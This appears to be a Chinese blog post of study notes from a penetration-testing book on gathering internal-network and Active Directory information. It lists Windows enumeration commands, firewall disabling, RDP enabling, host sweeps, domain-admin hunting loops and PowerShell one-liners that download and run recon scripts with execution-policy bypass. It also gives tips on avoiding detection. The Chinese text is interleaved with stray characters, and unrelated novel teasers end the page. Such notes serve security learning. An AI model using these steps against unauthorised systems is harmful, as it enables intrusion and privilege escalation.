《內(nèi)網(wǎng)安全攻防.滲透測(cè)試實(shí)戰(zhàn)指南》學(xué)習(xí)筆記二:內(nèi)網(wǎng)信息收集

內(nèi)網(wǎng)信息收集

在內(nèi)網(wǎng)環(huán)境中莉恼,信息收集尤為重要。信息收集的廣度與深度供璧,往往決定你的滲透測(cè)試的成果佩伤。

工作組信息收集

本機(jī)信息收集有通常有以下幾種信息需要收集:

1. 查詢網(wǎng)絡(luò)配置

  • ipconfig /all

    • 可以判斷是否處于內(nèi)網(wǎng)、內(nèi)網(wǎng)IP段济丘、網(wǎng)關(guān)谱秽、DNS服務(wù)器地址、

    • 判斷有沒有域

2. 查詢用戶列表

  • net user 查看本機(jī)用戶列表

    • 可以看大型企業(yè)的用戶名命名規(guī)則
  • net localgroup administrators 查看本機(jī)管理員

    • 通常含有域用戶摹迷,用戶批量管理主機(jī)的
  • query user || qwinsta 查看當(dāng)前在線用戶

3. 查看進(jìn)程列表

  • tasklist /v

    • 可看裝了什么軟件疟赊,域內(nèi)可能裝同樣的軟件

    • 可看進(jìn)程是用什么權(quán)限運(yùn)行的。若進(jìn)程是以域管理員權(quán)限運(yùn)行的泪掀,可通過令牌的竊取注入進(jìn)程里听绳,獲取域管理員權(quán)限。

  • wmic process list brief

4. 查看操作系統(tǒng)及安裝軟件版本信息

  • systeminfo | findstr /B /C:"OS 名稱" /C:"OS 版本" (英文版的話需要寫成Name與Version)

  • wmic product get name,version

    • 查看軟件安裝及版本异赫、路徑等⊥凡恚可看殺軟的版本塔拳,然后可找漏洞。
  • powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name,version"

    • 查看軟件安裝及版本峡竣、路徑等靠抑。可看殺軟的版本适掰,然后可找漏洞颂碧。

5. 查詢端口列表

  • netstat -ano

    • 可以通過信息判斷服務(wù)器,如開放53端口(DNS服務(wù)器)类浪、8530(WSUS更新)载城、或代理服務(wù)器。

6. 查看補(bǔ)丁列表

  • systeminfo

    • 查看各種系統(tǒng)信息费就、打補(bǔ)丁信息诉瓦,還可以判斷有沒有域
  • wmic qfe get Caption,Description,HotFixID,InstalledOn

    • 可看打補(bǔ)丁的詳細(xì)信息

7. 查詢本機(jī)共享

  • net share

    • 域內(nèi)的共享很多時(shí)候是相同的。
  • wmic share get name,path,status

8. 關(guān)于防火墻配置

  • netsh firewall show config 查看防火墻配置詳細(xì)信息

  • netsh firewall set opmode mode = enable 啟動(dòng)防火墻

  • netsh advfirewall set allprofiles state off 關(guān)閉防火墻

    • 直接關(guān)閉防火墻動(dòng)靜有點(diǎn)大,可以添加規(guī)則睬澡,達(dá)到目的后再刪除規(guī)則固额。

9. 查詢并開啟遠(yuǎn)程連接服務(wù)。

  • Reg query "hkey_local_machine\system\currentcontrolset\control\terminal server\winstations\RDP-Tcp" /v portnumber 查看遠(yuǎn)程連接端口

  • Windows Server 2008和Windows Server 2012開啟3389方法

    • wmic /namespace:\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1

    • wmic /namespace:\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName='RDP-Tcp') call setuserauthenticationrequired 1

    • reg add "HKLM\SYSTEM\CURRENT\CONTROLSET\CONTROL\TERMINAL SERVER" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

10. 查詢當(dāng)前權(quán)限

  • whoami

    • 本地普通用戶不能查詢域內(nèi)信息

    • 本地管理員可以查詢域內(nèi)信息

    • 域內(nèi)用戶可以查詢域內(nèi)信息

  • whoami /all

    • 獲取域SID煞聪。SID:域內(nèi)作為身份認(rèn)證的唯一標(biāo)識(shí)斗躏。后面域滲透中令牌竊取即竊取SID
  • net user XXX /domain 查詢指定賬戶的詳細(xì)信息

域內(nèi)信息收集

1. 判斷是否有域

  • ipconfig /all

  • systeminfo

  • net config workstation

  • net time /domain

    • 存在域,當(dāng)前用戶不是域用戶

    • 存在域昔脯,當(dāng)前用戶是域用戶

    • 提示"找不到域xx的域控制器":不存在域

2. 域內(nèi)存活主機(jī)的探測(cè)

白天探測(cè)瑟捣,深夜探測(cè),找出規(guī)律栅干。

  • 利用netbios快速探測(cè)內(nèi)網(wǎng)

    • 工具:Nbtscan

    • 使用方法:nbtscan.exe IP

  • 利用ICMP協(xié)議快速探測(cè)內(nèi)網(wǎng)

    • ping命令迈套。

      • for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL=” 其中“192.168.1”為網(wǎng)段。
    • VBS腳本

  • 利用arp掃描完整探測(cè)內(nèi)網(wǎng)

    • 工具:arp-scan碱鳞,命令:arp.exe -t IP

    • Empire中的arpscan模塊

    • Invoke-ARPScan.ps1

    • 命令:

      A.遠(yuǎn)程下載運(yùn)行

      powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(' http://192.168.1.1/Invoke-ARPScan.ps1');Invoke-ARPScan -CIDR 192.168.1.0/20" >> c:\windows\temp\log.txt

      B.本地運(yùn)行

      powershell.exe -exec bypass -Command "& {Import-Module C:\windows\temp\Invoke-ARPScan.ps1; Invoke-ARPScan -CIDR 192.168.1.0/20}" >> C:\windows\temp\log.txt

      C. 無條件運(yùn)行

      powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 192.168.1.0/24 -T 4 -ports '445,1433,8080,3389,80' -oA c:\windows\temp\res.txt"

  • 利用常規(guī)tcp/udp端口掃描探測(cè)內(nèi)網(wǎng)

    • 工具:scanline

    • 命令:sl -h -t 22,80-89,110,389,445,3389,1099,1433,2049,6379,7001,8080,1521,3306,3389,5432 -u 53,161,137,139 -O c:\windows\temp\sl_res.txt -p 192.168.1.1-254 /b

  • 域內(nèi)端口掃描

    注意掃描是否會(huì)觸發(fā)IDS桑李,windows推薦使用powershell、wmic的腳本進(jìn)行掃描窿给。降低掃描的頻率贵白。

    • 端口的banner服務(wù)(歡迎語(yǔ)句):在banner信息中可以得到軟件開發(fā)商,軟件名稱崩泡、版本禁荒、服務(wù)類型等信息,通過這些信息可以使用某些工具直接去使用相對(duì)應(yīng)的exp去攻擊角撞。

    • 端口上運(yùn)行的服務(wù)

    • 常見應(yīng)用的默認(rèn)端口

    • 常用nmap呛伴、masscan(動(dòng)靜比較大,已授權(quán)情況下)

    • telnet命令

    • s掃描器(速度快)

      • 命令舉例:S.exe TCP 192.168.1.1 192.168.1.254 445,3389,1433,7001,1099,8080,80,22,23,21,25,110,3306,5432,1521,6379,2049,111 256 /Banner /save
    • metasploit可調(diào)用nmap及自身所帶的腳本

      • 如search portscan谒所,然后Use auxiliary/scanner/portscan/tcp
    • Invoke-portscan.ps1(在powersploit下的腳本)

    • 常見端口機(jī)器攻擊方向

image.png
image.png

3. 域內(nèi)基礎(chǔ)信息收集

某些命令需要域用戶或主機(jī)system權(quán)限才能運(yùn)行热康。

  • net view /domain 查詢域

  • net view /domain:XXX 查詢域內(nèi)電腦,有時(shí)可以根據(jù)電腦名字判斷目標(biāo)主機(jī)為什么類型的主機(jī)劣领。

  • net group /domain 查詢域里的用戶組

  • net group "domain computers" /domain 查詢域成員的計(jì)算機(jī)列表

  • net accounts /domain 查詢域里密碼的策略

  • nltest /domain_trusts 查詢域信任信息

4. 查詢域控

  • nltest /DCLIST:XXX xxx為域的名稱

  • Nslookup -type=SRV ldap.tcp

  • net time /domain

  • net group "Domain Controllers" /domain 查詢所有域控

  • netdom query pdc

5. 查詢域內(nèi)用戶與管理員

  • net user /domain 查詢域內(nèi)所有用戶

  • wmic useraccount get /all 獲取域內(nèi)用戶的詳細(xì)信息

  • dsquery user

  • net localgroup administrators /domain 查詢域內(nèi)置的本地管理員組的用戶

  • net group "domain admins" /domain 查詢域管理員用戶組

  • net group "Enterprise Admins" /domain 查詢域管理員用戶組

定位域管理員

定位域內(nèi)管理員的方法:一是通過日志姐军,二是會(huì)話。日志指的的本地機(jī)器的管理員日志尖淘,可以使用腳本或wevtutil導(dǎo)出查看奕锌。會(huì)話是域內(nèi)每個(gè)機(jī)器的登陸會(huì)話,可以匿名查詢村生,無需權(quán)限惊暴,可以使用netsess.exe或powerview等工具查詢。一個(gè)主機(jī)a加入到域XX中梆造,那么域XX的管理員組會(huì)默認(rèn)加入到主機(jī)a的本地管理員組中缴守。

1. 定位域管理員的工具

  • psloggedon.exe 查找管理員登錄信息

    • psloggedon [-] [-l] [-x] [\computername|username] -l 表示本地登錄的
  • PVEFindADUser.exe (需要管理員權(quán)限)

    • -current
  • netsess.exe 查找主機(jī)會(huì)話

    • -h
  • PowerView腳本-Invoke-UserHunter

    • powershell.exe -exec bypass -Command "& {Import-Module C:\PowerView.ps1;Invoke-UserHunter}" 隱藏使用葬毫,調(diào)用C:\PowerView.ps1腳本

查找域管理進(jìn)程

1. 本機(jī)檢查

  • 獲取域管理員列表。命令:net group "Domain Admins" /domain

  • 查看本機(jī)所有進(jìn)程及進(jìn)程用戶屡穗。命令:tasklist /v

  • 尋找是否有進(jìn)程所有者為域管理員的進(jìn)程贴捡。

2. 查詢域控制器的域用戶會(huì)話(腳本)

  • 收集所有域控制器的列表。 net group "Domain Controllers" /domain

  • 收集域管理員列表村砂。 net group "Domain Admins" /domain

  • 使用Netsess.exe查詢每個(gè)域控制器烂斋,收集所有活動(dòng)域會(huì)話的列表。 Netsess.exe –h

  • 將域管理員列表與活動(dòng)會(huì)話列表交叉引用础废,以確定哪些IP地址具有活動(dòng)域令牌汛骂。

3. 掃描遠(yuǎn)程系統(tǒng)上運(yùn)行的任務(wù)

這個(gè)方法運(yùn)行的前提:域管理員賬號(hào)開啟了共享

  • 收集域管理員的列表 net group "Domain Admins" /domain

  • 運(yùn)行腳本。將目標(biāo)域系統(tǒng)添加到ips.txt文件中评腺,將收集到的域管理員列表添加到names.txt文件中帘瞭。

FOR /F %i in (ips.txt) DO @echo [+] %i && @tasklist /V /S %i /U user /P password 2>NUL > output.txt && FOR /F %n in (names.txt) DO @type output.txt | findstr %n > NUL && echo [!] %n was found running a process on %i && pause

4. 掃描遠(yuǎn)程系統(tǒng)上NetBIOS信息

  • 收集域管理員列表。

  • 運(yùn)行腳本蒿讥。將目標(biāo)域系統(tǒng)列表添加到ips.txt文件中蝶念,將收集到的域管理員列表添加到admins.txt文件中。并置于同一目錄下芋绸。

for /F %i in (ips.txt) do @echo [+] Checking %i && nbtstat -A %i 2>NUL >nbsessions.txt && FOR /F %n in (admins.txt) DO @type nbsessions.txt | findstr /I %n > NUL && echo [!] %n was found logged into %i

  • 也可以使用nbtscan工具媒殉。先收集管理員列表。然后將目標(biāo)域系統(tǒng)列表添加到ips.txt文件中摔敛,將收集到的域管理員列表添加到admins.txt文件中廷蓉。并置于同一目錄下。

for /F %i in (ips.txt) do @echo [+] Checking %i && nbtscan -f %i 2>NUL >nbsessions.txt && FOR /F %n in (admins.txt) DO @type nbsessions.txt | findstr /I %n > NUL && echo [!] %n was found logged into %i

Powershell收集域信息

2.0內(nèi)置于win server 2008與win 7中

3.0內(nèi)置于win server 2012與win 8中

4.0內(nèi)置于win server 2012 R2與win 8.1中

5.0內(nèi)置于win server 2016 與win 10中

1. Powershell四種權(quán)限

  • Restricted 默認(rèn)設(shè)置马昙,不允許執(zhí)行任何腳本桃犬。

  • Allsigned 只能運(yùn)行經(jīng)過證書驗(yàn)證的腳本。

  • Unrestricted 權(quán)限最高给猾,可以執(zhí)行任意腳本疫萤。

  • RemoteSigned 對(duì)本地腳本不進(jìn)行限制,對(duì)來自網(wǎng)絡(luò)的腳本必須驗(yàn)證其簽名敢伸。

操作:

  • 輸入Get-ExecutionPolicy 可查看當(dāng)前執(zhí)行權(quán)限

  • Get-ExecutionPolicy + 權(quán)限 更改執(zhí)行權(quán)限。

2. Powershell收集域信息

Powershell中常用命令:

image.png

域滲透分析工具BloodHound的使用

詳細(xì)請(qǐng)閱:《內(nèi)網(wǎng)安全攻防.實(shí)戰(zhàn)滲透測(cè)試指南》P76

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末恒削,一起剝皮案震驚了整個(gè)濱河市池颈,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌钓丰,老刑警劉巖躯砰,帶你破解...
    沈念sama閱讀 206,968評(píng)論 6 482
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異携丁,居然都是意外死亡琢歇,警方通過查閱死者的電腦和手機(jī)兰怠,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,601評(píng)論 2 382
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來李茫,“玉大人揭保,你說我怎么就攤上這事∑呛辏” “怎么了秸侣?”我有些...
    開封第一講書人閱讀 153,220評(píng)論 0 344
  • 文/不壞的土叔 我叫張陵,是天一觀的道長(zhǎng)宠互。 經(jīng)常有香客問我味榛,道長(zhǎng),這世上最難降的妖魔是什么予跌? 我笑而不...
    開封第一講書人閱讀 55,416評(píng)論 1 279
  • 正文 為了忘掉前任搏色,我火速辦了婚禮,結(jié)果婚禮上券册,老公的妹妹穿的比我還像新娘频轿。我一直安慰自己,他們只是感情好汁掠,可當(dāng)我...
    茶點(diǎn)故事閱讀 64,425評(píng)論 5 374
  • 文/花漫 我一把揭開白布略吨。 她就那樣靜靜地躺著,像睡著了一般考阱。 火紅的嫁衣襯著肌膚如雪翠忠。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 49,144評(píng)論 1 285
  • 那天乞榨,我揣著相機(jī)與錄音秽之,去河邊找鬼。 笑死吃既,一個(gè)胖子當(dāng)著我的面吹牛考榨,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播鹦倚,決...
    沈念sama閱讀 38,432評(píng)論 3 401
  • 文/蒼蘭香墨 我猛地睜開眼河质,長(zhǎng)吁一口氣:“原來是場(chǎng)噩夢(mèng)啊……” “哼!你這毒婦竟也來了震叙?” 一聲冷哼從身側(cè)響起掀鹅,我...
    開封第一講書人閱讀 37,088評(píng)論 0 261
  • 序言:老撾萬榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎媒楼,沒想到半個(gè)月后乐尊,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 43,586評(píng)論 1 300
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡划址,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,028評(píng)論 2 325
  • 正文 我和宋清朗相戀三年扔嵌,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了限府。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 38,137評(píng)論 1 334
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡痢缎,死狀恐怖胁勺,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情牺弄,我是刑警寧澤姻几,帶...
    沈念sama閱讀 33,783評(píng)論 4 324
  • 正文 年R本政府宣布,位于F島的核電站势告,受9級(jí)特大地震影響顷链,放射性物質(zhì)發(fā)生泄漏臀玄。R本人自食惡果不足惜拄衰,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,343評(píng)論 3 307
  • 文/蒙蒙 一奋隶、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧回溺,春花似錦春贸、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,333評(píng)論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)。三九已至车要,卻和暖如春允粤,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背翼岁。 一陣腳步聲響...
    開封第一講書人閱讀 31,559評(píng)論 1 262
  • 我被黑心中介騙來泰國(guó)打工类垫, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人琅坡。 一個(gè)月前我還...
    沈念sama閱讀 45,595評(píng)論 2 355
  • 正文 我出身青樓悉患,卻偏偏與公主長(zhǎng)得像,于是被迫代替她去往敵國(guó)和親榆俺。 傳聞我的和親對(duì)象是個(gè)殘疾皇子售躁,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 42,901評(píng)論 2 345